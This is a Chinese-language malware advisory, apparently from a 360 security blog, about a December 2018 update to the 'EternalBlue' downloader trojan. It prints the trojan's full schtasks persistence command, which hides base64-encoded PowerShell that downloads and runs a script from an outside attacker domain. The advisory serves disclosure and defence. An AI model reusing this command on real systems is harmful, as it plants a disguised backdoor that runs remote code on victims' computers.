360安全卫士
360杀毒
360文档卫士
360安全浏览器
360极速浏览器
360安全云盘
360随身WiFi
360搜索
系统急救箱
重装大师
勒索病毒救助
急救盘
高危漏洞免疫
360压缩
驱动大师
鲁大师
360换机助手
360清理大师Win10
360游戏大厅
360软件管家
360手机卫士
360防骚扰大师
360加固保
360贷款神器
360手机浏览器
360安全云盘
360免费WiFi
安全客
手机助手
安全换机
360帮帮
清理大师
省电王
360商城
360天气
360锁屏
手机专家
快剪辑
360影视
360娱乐
快资讯
你财富
360借条
360互助
信贷管家
360摄像机云台AI版
360摄像机小水滴AI版
360摄像机云台变焦版
360可视门铃
360摄像机云台1080p
家庭防火墙V5S增强版
家庭防火墙5Pro
家庭防火墙5SV2
家庭防火墙路由器5C
360儿童手表S1
360儿童手表8X
360儿童手表P1
360儿童手表SE5
360智能健康手表
行车记录仪M310
行车记录仪K600
行车记录仪G380
360行车记录仪G600
儿童安全座椅
360扫地机器人X90
360扫地机器人T90
360扫地机器人S7
360扫地机器人S6
360扫地机器人S5
360安全卫士
360杀毒
360文档卫士
360安全浏览器
360极速浏览器
360随身WiFi
360搜索
系统急救箱
重装大师
急救盘
勒索病毒救助
360压缩
驱动大师
鲁大师
360游戏大厅
360软件管家
360手机卫士
360防骚扰大师
手机急救箱
360加固保
360贷款神器
360免费WiFi
安全客
手机助手
一键root
安全换机
360帮帮
信用卫士
清理大师
省电王
360商城
流量卫士
360天气
360锁屏
手机专家
快剪辑
360影视
360娱乐
快资讯
你财富
360借条
360手机N7
360手机N6
Pro
360手机vizza
360手机N5S
360儿童手表6C
360儿童手表6W
360儿童手表SE2代
360手表SE2Plus
360老人手表
360摄像机大众版
360安全路由器P3
360安全路由器P2
360儿童机器人
外设产品
影音娱乐
平板电脑
二手手机
二代 美猴王版
二代
美猴王领航版
标准升级版
后视镜版
车载电器警报!“永恒之蓝”下载器木马再度更新!
- 2018-12-19 17:23:16
前不久,360安全大脑预警了《驱动人生传播永恒之蓝下载器木马》,今天上午,“永恒之蓝”下载器木马再次更新。此次更新通过服务器调整云控指令,实现对木马下载模块的更新,这也体现出了此类下载器木马的灵活性—可随时更新木马组件。下图是新的攻击模块下载地址:
这次更新的文件为之前的“永恒之蓝”漏洞攻击组件,保留了之前永恒之蓝漏洞攻击的模块,新增加一个powershell后门,同时更新了木马程序落地的名称。
其中powershell的后门通过注册一个计划任务实现:
命令行:C:WINDOWSsystem32cmd.exe /c schtasks /create /ru system /sc MINUTE /mo 50 /st 07:05:00 /tn "MicrosoftwindowsBluetooths" /tr "powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcgAuAG0AaQBuAGkAYwBlAG4ALgBnAGEALwByAD8AcAAnACkA" /F
解码之后,利用powershell执行这一段脚本:'hxxp://r.minicen.ga/r?p'
目前看,这个域名刚刚注册,还没有做解析,后续可以通过这段脚本,长期驻留用户计算机,下发攻击脚本。
使用360安全卫士的用户无须担心,360安全卫士可拦截和查杀此类木马和后门。
京公网安备 11000002000006号